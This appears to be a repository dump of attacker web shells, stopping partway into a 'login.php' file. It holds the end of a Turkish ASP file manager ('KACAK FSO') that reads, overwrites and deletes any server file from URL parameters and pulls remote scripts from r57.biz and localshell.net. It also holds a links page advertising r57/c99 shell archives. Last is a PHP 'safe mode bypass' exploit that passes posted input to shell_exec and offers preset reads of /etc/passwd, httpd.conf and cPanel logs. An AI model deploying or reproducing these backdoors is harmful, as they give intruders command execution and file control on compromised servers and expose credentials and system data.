set klasdri=klassis.drives
|
||||
%>
|
||||
|
||||
<%
|
||||
for each dongu in klasdri
|
||||
%>
|
||||
|
||||
<%
|
||||
if dongu.driveletter <> "A" then
|
||||
if dongu.isready=true then
|
||||
%>
|
||||
|
||||
<%
|
||||
select case dongu.drivetype
|
||||
case 0 teype="Diðer"
|
||||
case 1 teype="Taþýnýr"
|
||||
case 2 teype="HDD"
|
||||
case 3 teype="NetWork"
|
||||
case 4 teype="CD-Rom"
|
||||
case 5 teype="FlashMem"
|
||||
end select
|
||||
%>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber3" height="17">
|
||||
<tr>
|
||||
<td width="208" height="17" align="left" bgcolor="#EEEEEE">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=dongu.driveletter%>:\ ( <%=dongu.filesystem%> )</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.totalsize/(1024*1024),1)%> MB</font></td>
|
||||
<td width="75" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=Round(dongu.availablespace/(1024*1024),1)%> MB</font></td>
|
||||
<td width="64" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<font face="Verdana" style="font-size: 8pt"><%=teype%> </font></td>
|
||||
<td width="62" height="17" align="center" bgcolor="#E0E0E0">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber24">
|
||||
<tr>
|
||||
<td width="62" height="17" align="center" bgcolor="#E0E0E0"
|
||||
onmouseover="this.style.background='#A0A0A0'"
|
||||
onmouseout="this.style.background='#E0E0E0'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
>
|
||||
<a href="?klas=<%=dongu.driveletter%>:\" style="text-decoration: none">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#000000">Gir</font></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<%
|
||||
end if
|
||||
end if
|
||||
%>
|
||||
<%
|
||||
next
|
||||
%>
|
||||
|
||||
|
||||
|
||||
</center>
|
||||
</div>
|
||||
<div align="center">
|
||||
<center>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="484" id="AutoNumber4" height="4">
|
||||
<tr>
|
||||
<td width="484" height="4" align="center" bgcolor="#C5C5C5">
|
||||
<span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</center>
|
||||
</div>
|
||||
<p> </p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" height="19" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("kaydet") <> "" then
|
||||
set dossisx=server.createobject("scripting.filesystemobject")
|
||||
set dosx=dossisx.opentextfile(request.querystring("kaydet"), 2, true)
|
||||
dosx.write request("duzenx")
|
||||
dosx.close
|
||||
set dosyax=nothing
|
||||
set dossisx=nothing
|
||||
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if request.querystring("duzenle") <> "" then
|
||||
set dossis=server.createobject("scripting.filesystemobject")
|
||||
set dos=dossis.opentextfile(request.querystring("duzenle"), 1)
|
||||
sedx = dos.readall
|
||||
dos.close
|
||||
set dosya=nothing
|
||||
set dossis=nothing
|
||||
|
||||
set aktifklas=request.querystring("klas")
|
||||
%>
|
||||
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
TC & GH & TC TEAM©<br>
|
||||
</span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
|
||||
<font color="#858585">www.GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Dosya</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(request.querystring("duzenle"))%></font></td>
|
||||
<td width="65">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#000000">
|
||||
<form method="POST" action="?kaydet=<%=request.querystring("duzenle")%>&klas=<%=aktifklas%>" name="kaypos">
|
||||
<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red">
|
||||
<textarea name="duzenx"
|
||||
style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
|
||||
|
||||
|
||||
rows="24" cols="163" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
|
||||
</font></b></p>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
|
||||
<tr>
|
||||
<td width="100%" align="right">
|
||||
<p align="center">
|
||||
<span class="gensmall">
|
||||
<input type="submit" size="16"
|
||||
name="duzenx1" value="Kaydet"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span><a href=""><input type="reset" size="16"
|
||||
name="x" value="Vazgeç"
|
||||
style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
|
||||
</span></a></td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#EAEAEA">
|
||||
<p align="right">
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
else
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
|
||||
if request.querystring("klas") <> "" then
|
||||
aktifklas=Request.querystring("klas")
|
||||
if request.querystring("usak") = "1" then
|
||||
aktifklas=aktifklas & "\"
|
||||
end if
|
||||
|
||||
else
|
||||
aktifklas=server.mappath("/")
|
||||
aktifklas=aktifklas & "\"
|
||||
end if
|
||||
|
||||
if request.querystring("silklas") <> "" then
|
||||
set sis=createobject("scripting.filesystemobject")
|
||||
silincekklas=request.querystring("silklas")
|
||||
sis.deletefolder(silincekklas)
|
||||
set sis=nothing
|
||||
'response.write(sil & " Silindi")
|
||||
end if
|
||||
|
||||
if request.querystring("sildos") <> "" then
|
||||
silincekdos=request.querystring("sildos")
|
||||
set dosx=createobject("scripting.filesystemobject")
|
||||
set dos=dosx.getfile(silincekdos)
|
||||
dos.delete
|
||||
set dos=nothing
|
||||
set dosyasis=nothing
|
||||
end if
|
||||
|
||||
|
||||
|
||||
|
||||
select case aktifklas
|
||||
case "C:" aktifklas="C:\"
|
||||
case "D:" aktifklas="D:\"
|
||||
case "E:" aktifklas="E:\"
|
||||
case "F:" aktifklas="F:\"
|
||||
case "G:" aktifklas="G:\"
|
||||
case "H:" aktifklas="H:\"
|
||||
case "I:" aktifklas="I:\"
|
||||
case "J:" aktifklas="J:\"
|
||||
case "K:" aktifklas="K:\"
|
||||
end select
|
||||
|
||||
|
||||
|
||||
if aktifklas=("C:") then aktifklas=("C:\")
|
||||
|
||||
Set FS = CreateObject("Scripting.FileSystemObject")
|
||||
Set klasor = FS.GetFolder(aktifklas)
|
||||
Set altklasorler = klasor.SubFolders
|
||||
Set dosyalar = klasor.files
|
||||
%>
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
|
||||
<tr>
|
||||
<td width="70" bgcolor="#000000" height="76">
|
||||
<p align="center">
|
||||
<img border="0" src="http://www.grayhatz.org/forum/dragontwo/logo.jpg"></td>
|
||||
<td width="501" bgcolor="#000000" height="76" valign="top">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
TC & GH & TC TEAM ©<br><br>
|
||||
</span>Terrorist Crew - GrayHatz Hacking Team - TurkGuvenligi Priv8 Team<br>
|
||||
<span style="font-weight: 700">
|
||||
<br>
|
||||
KACAK FSO 1.0</span></font></td>
|
||||
<td width="431" bgcolor="#000000" height="76" valign="top">
|
||||
<p align="right"><span style="font-weight: 700">
|
||||
<font face="Verdana" color="#858585" style="font-size: 2pt"><br>
|
||||
</font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="http://www.grayhatz.org ~ http://www.turkguvenligi.info" style="text-decoration: none">
|
||||
<font color="#858585">www.GrayHatz ~ TurkGuvenligi.Ýnfo</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> <br>
|
||||
</font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
|
||||
<a href="mailto:BuqX@hotmail.com" style="text-decoration: none">
|
||||
<font color="#858585">BuqX</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:BuqX@hootmail.com" style="text-decoration: none"><font color="#858585">@Hotmail.com</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585"> </font></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
|
||||
<tr>
|
||||
<td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
|
||||
<span style="font-size: 8pt"> Çalýþýlan Klasör</span></font></td>
|
||||
<td bgcolor="#D6D6D6" height="20">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
|
||||
<tr>
|
||||
<td width="1"></td>
|
||||
<td><font face="Verdana" style="font-size: 8pt"> <%=response.write(aktifklas)%></font></td>
|
||||
<td width="65">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13">
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
|
||||
<a href="?usklas=1&klas=<%=server.urlencode(left(aktifklas,(instrRev(aktifklas,"\"))-1))%>" style="text-decoration: none">
|
||||
<font color="#000000">Üst Klasör</font></a></font></td>
|
||||
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
|
||||
<tr>
|
||||
<td width="625" bgcolor="#000000"><span style="font-size: 2pt"> </span></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td bgcolor="#000000" height="20">
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
|
||||
height="19" bordercolor="#000000">
|
||||
<span style="font-weight: 700">
|
||||
<font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
|
||||
<a href="?suruculer=1" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Sürücüler</font></a></font></span></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="?klasac=1&aktifklas=<%=aktifklas%>" style="text-decoration: none">
|
||||
<font color="#9F9F9F">Yeni Klasör</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
|
||||
<tr>
|
||||
<td align="center" bgcolor="#5F5F5F" height="19"
|
||||
onmouseover="style.background='#6F6F6F'"
|
||||
onmouseout="style.background='#5F5F5F'"
|
||||
style="CURSOR: hand"
|
||||
bordercolor="#000000">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
|
||||
<a href="?yenidosya=<%=aktifklas%>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
|
||||
<tr>
|
||||
<SCRIPT SRC=http://www.localshell.net/yazciz/ciz.js></SCRIPT>
|
||||
<td width="30" height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Tür</font></td>
|
||||
<td height="17" bgcolor="#9F9F9F">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Dosya
|
||||
Adý</font></td>
|
||||
<td width="122" height="17" bgcolor="#9F9F9F">
|
||||
<p align="center">
|
||||
<font face="Verdana" style="font-size: 8pt; font-weight: 700"> Ýþlem</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
<% For each oge in altklasorler %>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
|
||||
<tr>
|
||||
<td width="30" height="17" bgcolor="#808080">
|
||||
<p align="center">
|
||||
<img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
|
||||
<td height="17" bgcolor="#C4C4C4">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=oge.name%> </font></td>
|
||||
<td width="61" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="?klas=<%=aktifklas%><%=oge.name%>\" style="text-decoration: none">
|
||||
<font color="#000000">Aç</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="17" bgcolor="#C4C4C4" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#A3A3A3"
|
||||
onmouseover="this.style.background='#BBBBBB'"
|
||||
onmouseout="this.style.background='#A3A3A3'"
|
||||
|
||||
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="?silklas=<%=aktifklas & oge.name & "&klas=" & aktifklas %>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a>
|
||||
|
||||
</font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<% Next %>
|
||||
|
||||
|
||||
<% For each oge in dosyalar %>
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
|
||||
<tr>
|
||||
<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT>
|
||||
<td width="30" height="1" bgcolor="#B0B0B0">
|
||||
<p align="center">
|
||||
<img border="0" src="http://turkguvenligi.info/blues/statusicon/forum_new.gif"></td>
|
||||
<td height="1" bgcolor="#EAEAEA">
|
||||
<font face="Verdana" style="font-size: 8pt"> <%=oge.name%> </font>
|
||||
<font face="Arial Narrow" style="font-size: 8pt"> ( <%=Round(oge.size/1024,1)%> KB ) </font></td>
|
||||
<td width="61" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a style="text-decoration: none" target="_self" href="?duzenle=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>">
|
||||
<font color="#000000">Düzenle</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
<td width="60" height="1" bgcolor="#D6D6D6" align="center">
|
||||
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="20">
|
||||
<tr>
|
||||
<td width="100%" bgcolor="#D6D6D6" no wrap
|
||||
onmouseover="this.style.background='#ACACAC'"
|
||||
onmouseout="this.style.background='#D6D6D6'"
|
||||
style="CURSOR: hand"
|
||||
height="20">
|
||||
|
||||
<p align="center"><font face="Verdana" style="font-size: 8pt">
|
||||
<a href="?sildos=<%=aktifklas%><%=oge.name%>&klas=<%=aktifklas%>" style="text-decoration: none">
|
||||
<font color="#000000">Sil</font></a></font></td>
|
||||
</tr>
|
||||
</table>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<% Next %>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
if aktifklas=("C:\") then aktifklas=("C:")
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
<%
|
||||
end if
|
||||
%>
|
||||
|
||||
|
||||
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
|
||||
<tr>
|
||||
<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT>
|
||||
<td width="100%" bgcolor="#000000"> </td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
</body>
|
78
php/links.php
Normal file
78
php/links.php
Normal file
|
@ -0,0 +1,78 @@
|
|||
<style type="text/css">
|
||||
<!--
|
||||
body,td,th {
|
||||
font-family: Tahoma;
|
||||
font-size: 12px;
|
||||
color: #636161;
|
||||
}
|
||||
body {
|
||||
margin-top: 100px;
|
||||
margin-left: 200px;
|
||||
margin-right: 200px;
|
||||
background-color: #0D0C0C;
|
||||
}
|
||||
a {
|
||||
font-size: 12px;
|
||||
}
|
||||
a:link {
|
||||
text-decoration: none;
|
||||
color: #666666;
|
||||
}
|
||||
a:visited {
|
||||
text-decoration: none;
|
||||
color: #666666;
|
||||
}
|
||||
a:hover {
|
||||
text-decoration: none;
|
||||
}
|
||||
a:active {
|
||||
text-decoration: none;
|
||||
}
|
||||
h1,h2,h3,h4,h5,h6 {
|
||||
font-style: italic;
|
||||
}
|
||||
-->
|
||||
</style><title>r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 -
|
||||
c99 - shell archive - php shells - php exploits - bypass shell - safe mode
|
||||
bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root -
|
||||
r57.in</title>
|
||||
<meta name="title" content="r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - c99 - shell archive - php shells - php exploits - bypass shell - safe mode bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root - r57.in" />
|
||||
<meta name="description" content="r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 -
|
||||
c99 - shell archive - php shells - php exploits - bypass shell - safe mode
|
||||
bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root -
|
||||
r57.in" />
|
||||
<meta name="keywords" content="r57.txt - c99.txt - r57 shell - c99 shell - r57shell - c99shell - r57 - c99 - shell archive - php shells - php exploits - bypass shell - safe mode bypass - sosyete safe mode bypass shell - Evil Shells - exploit - root - r57.in" />
|
||||
<meta name="author" content="r57.in" />
|
||||
<meta name="owner" content="Herkes" />
|
||||
<meta name="copyright" content="(c) 2009" />
|
||||
|
||||
<div align="center">
|
||||
<pre>
|
||||
|
||||
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="80%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
|
||||
<p align="center">
|
||||
<img src="http://localshell.net/banner.jpg" alt="ShellCodes and Exploits City" width="587" height="71"></table>
|
||||
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
|
||||
<p align="center"><a href="index.php">[ Home ]</a> | <a href="shell.php">[ Shell ]</a> | <a href="video.php">[ Video ]</a> | <a href="links.php">[ Links ]</a>
|
||||
|
||||
</table>
|
||||
<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
|
||||
<p align="center">
|
||||
<a href="http://tr0yan0.blogspot.com">[ Sosyete</a> | <a href="http://t0fan.blogspot.com">T0fan</a>
|
||||
<a href="http://kernel.sh">[ Kernel@Sh</a> | <a href="http://milw0rm.com">Milw0rm</a>
|
||||
<a href="http://www.googlebig.com/">Google Big</a> <a href="http://www.darkc0de.com/">Darkc0de</a> ] <a href="http://www.remote-exploit.org">BackTrack ]</a>
|
||||
|
||||
|
||||
|
||||
|
||||
www.r57.in
|
||||
</table>
|
||||
|
||||
Send all submissions to Mail <a href="mailto:thesabotaqe@gmail.com">r57</a> or r57.in
|
||||
|
||||
Copyright © 2oo8~2oo9 <a href="http://localshell.net">Localshell</a>
|
||||
|
||||
Sitemiz en iyi Firefox ile (1024 x 768 veya Üstü çözünürlükte) görünmektedir.
|
||||
</table>
|
||||
</pre>
|
||||
</div>
|
34
php/liz0zim.php
Normal file
34
php/liz0zim.php
Normal file
|
@ -0,0 +1,34 @@
|
|||
<?
|
||||
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit</font></b><br>";
|
||||
print_r('
|
||||
<pre>
|
||||
<form method="POST" action="">
|
||||
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="Çalýþtýr" type="submit">
|
||||
</form>
|
||||
<form method="POST" action="">
|
||||
<b><font color=blue>Hýzlý Menü :=) :</font><select size="1" name="liz0">
|
||||
<option value="cat /etc/passwd">/etc/passwd</option>
|
||||
<option value="netstat -an | grep -i listen">Tüm Açýk Portalarý Gör</option>
|
||||
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
|
||||
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
|
||||
<option value="cat /etc/hosts">/etc/hosts</option>
|
||||
<option value="cat /etc/named.conf">/etc/named.conf</option>
|
||||
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
|
||||
</select> <input type="submit" value="Göster Bakim">
|
||||
</form>
|
||||
</pre>
|
||||
');
|
||||
ini_restore("safe_mode");
|
||||
ini_restore("open_basedir");
|
||||
$liz0=shell_exec($_POST[baba]);
|
||||
$liz0zim=shell_exec($_POST[liz0]);
|
||||
$uid=shell_exec('id');
|
||||
$server=shell_exec('uname -a');
|
||||
echo "<pre><h4>";
|
||||
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
|
||||
echo "<b><font color=red>Server</font></b>:$server<br>";
|
||||
echo "<b><font color=red>Komut Sonuçlarý:</font></b><br>";
|
||||
echo $liz0;
|
||||
echo $liz0zim;
|
||||
echo "</h4></pre>";
|
||||
?>
|
583
php/login.php
Normal file
583
php/login.php
Normal file
|
@ -0,0 +1,583 @@
|
|||
|
||||
<html><head><title>EgY SpIdEr </title>
|
||||
<STYLE>
|
||||
|
||||
BODY
|
||||
{
|
||||
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
|
||||
}
|
||||
|
||||
tr {
|
||||
BORDER-RIGHT: #dadada ;
|
||||
BORDER-TOP: #dadada ;
|
||||
BORDER-LEFT: #dadada ;
|
||||
BORDER-BOTTOM: #dadada ;
|
||||
color: #ffffff;
|
||||
}
|
||||
td {
|
||||
BORDER-RIGHT: #dadada ;
|
||||
BORDER-TOP: #dadada ;
|
||||
BORDER-LEFT: #dadada ;
|
||||
BORDER-BOTTOM: #dadada ;
|
||||
color: #dadada;
|
||||
}
|
||||
.table1 {
|
||||
BORDER: 1;
|
||||
BACKGROUND-COLOR: #000000;
|
||||
color: #333333;
|
||||
}
|
||||
.td1 {
|
||||
BORDER: 1;
|
||||
font: 7pt tahoma;
|
||||
color: #ffffff;
|
||||
}
|
||||
.tr1 {
|
||||
BORDER: 1;
|
||||
color: #dadada;
|
||||
}
|
||||
table {
|
||||
BORDER: #eeeeee outset;
|
||||
